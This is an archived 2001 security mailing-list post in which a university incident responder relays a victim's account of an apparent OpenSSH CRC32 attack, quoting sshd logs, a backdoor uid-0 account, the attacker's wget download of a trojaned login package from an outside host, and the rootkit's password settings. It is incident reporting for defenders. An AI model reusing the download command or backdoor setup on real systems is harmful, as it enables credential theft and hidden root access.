Attacks against SSH?

From: johan.augustsson@adm.gu.se
Date: 12/03/01


Date: Mon, 03 Dec 2001 08:30:23 +0100
From: johan.augustsson@adm.gu.se
To: incidents@securityfocus.com


I stumbeled over this post at openssh-unix-dev mailinglist last week -
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for
RedHat 7.0) up and running when he received what looks to be a
CRC32-attack. A few minutes later you can see (he posted parts of the
logfile) a new user being created with uid=0 and then how an connection
is made from system in Israel.

There has been no confirmation about what he writes but I recieved the
following mail as an answer of my questions.

------ Message ------
I posted an openssh security alert earlier today and already got some
responses.
Thanks for everything.

Instead of replying to everyone individually I composed the details of
the
attack.

+++

It does not look like a job of worms.
Snort did not detect mass port scan from attacker's ip address. It seems
that he (I assumed, so I don't have to type he/she all the way) just
wants
to gain access through openssh.

The server is running Red Hat 7.0. With all packages up to date. The
following daemons are running: wu-ftpd, apache, telnet, openssh, named
I never access the system via telnet, it is there just for backup
purpose.

> > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation
attack:
> > network attack detected
> > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
> > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,
gid=528,
> > home=/home/mattanl, shell=/bin/bash
> > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,
gid=529,
> > home=/home/mattan, shell=/bin/bash

After the attacker gained root access. He created two users mattan and
mattanl.
He then downloaded a package: wget
http://home.dal.net/resolve/login.tgz.
The target site has been compromised. (hacked by a hacker group in
Israel)
This is a login replacement package, it logs the user id and passwords.
He
modified rk.h to:
#define MY_LOGFILE "/dev/ttypz"
#define MY_PASSWORD "1245890"
After he complied and installed the login replacement. Something went
wrong.
/bin/login was zero bytes in length. So when he came back using telnet,
he
was denied of access. I also disabled sshd and kept one session open for
remote control after found login was replaced. I md5 checked the system
against a good backup, nothing else was altered.

I will try to sniff all packets come to my this server on ssh port. If
he
attempts to crack the server again, I will have more details. But I
guess I
will have to turn the server back on.

Thanks for all you time
------ End of message ------

I had some further questions so I mailed the guy once again but has not
recieved any answer.

So, to he main question.
Has anyone else had a system compromised by the CRC32-attack when
running a version of sshd that is believed to be secure? OpenSSH-2.3.0
or later, SSH 1.2.32 or later.

/Johan Augustsson

--------------------------------------------------------------------
Johan Augustsson Phone: +46 (0)31 773 1000
Incident Response Team Fax: +46 (0)31 773 1087
Göteborg University E-mail: Johan.Augustsson@adm.gu.se
Sweden
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Re: Attacks against SSH?
    ... Per se, I have not seen anyone attacking my systems in general via SSH, ... > attack. ... > This is a login replacement package, it logs the user id and passwords. ... > I will try to sniff all packets come to my this server on ssh port. ...
    (Incidents)
  • Announce: OpenSSH 4.2 released
    ... OpenSSH 4.2 has just been released. ... implementation and includes sftp client and server support. ...
    (SSH)
  • Re: GSSAPI SSH WIN 2003
    ... OpenSSH does not have this flexibility. ... server that does; it is one of the most long-standing inadequacies of most ... used publickey authentication, for the simple reasons that it's ... > group will get Service ticket for my HP-UX box. ...
    (comp.security.ssh)
  • Announce: OpenSSH 4.3 released
    ... OpenSSH 4.3 has just been released. ... implementation and includes sftp client and server support. ...
    (SSH)
  • =?Utf-8?Q?DC_hin=C3=BCber_nach_=C3=84nderung_von_Pri?= =?Utf-8?Q?vilegien_=28OpenSSH_auf_Ser
    ... Server, zusammen bilden die eine AD Domäne ab. ... Jetzt versuche ich OpenSSH auf beiden zum Laufen zu bekommen. ... dass der Local System Account unter Windows Server 2003 nicht ... GPOs, da unsere GPO zuerst zieht und damit die Benutzer, die in den o.g. ...
    (microsoft.public.de.german.windows.server.general)